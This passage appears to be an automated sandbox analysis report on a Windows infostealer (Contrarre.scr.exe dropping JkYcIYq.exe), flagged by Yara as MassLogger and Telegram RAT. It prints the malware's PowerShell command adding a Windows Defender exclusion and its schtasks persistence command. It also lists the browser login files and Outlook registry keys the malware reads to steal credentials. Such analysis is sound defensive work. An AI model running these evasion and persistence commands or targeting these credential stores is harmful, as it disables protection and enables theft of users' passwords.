Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 4E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 5E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 5F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 6F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: A8D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: B8D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: BD60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 5F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: A8D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: BD60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 2760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 4980000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6091			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3555			Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe TID: 7412	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe TID: 7860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: JkYcIYq.exe, 0000000D.00000002.2611210230.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: Contrarre.scr.exe, 00000008.00000002.2611389126.0000000000FB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Contrarre.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe"
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory written: C:\Users\user\Desktop\Contrarre.scr.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory written: C:\Users\user\AppData\Roaming\JkYcIYq.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp3B82.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Users\user\Desktop\Contrarre.scr.exe "C:\Users\user\Desktop\Contrarre.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Users\user\Desktop\Contrarre.scr.exe "C:\Users\user\Desktop\Contrarre.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp48FF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process created: C:\Users\user\AppData\Roaming\JkYcIYq.exe "C:\Users\user\AppData\Roaming\JkYcIYq.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Users\user\Desktop\Contrarre.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Users\user\Desktop\Contrarre.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Users\user\AppData\Roaming\JkYcIYq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Users\user\AppData\Roaming\JkYcIYq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JkYcIYq.exe PID: 7840, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JkYcIYq.exe PID: 7840, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2614011404.0000000002F7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2613870891.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JkYcIYq.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JkYcIYq.exe PID: 8076, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JkYcIYq.exe PID: 7840, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.37f6d18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JkYcIYq.exe.386bac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Contrarre.scr.exe.4b84148.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
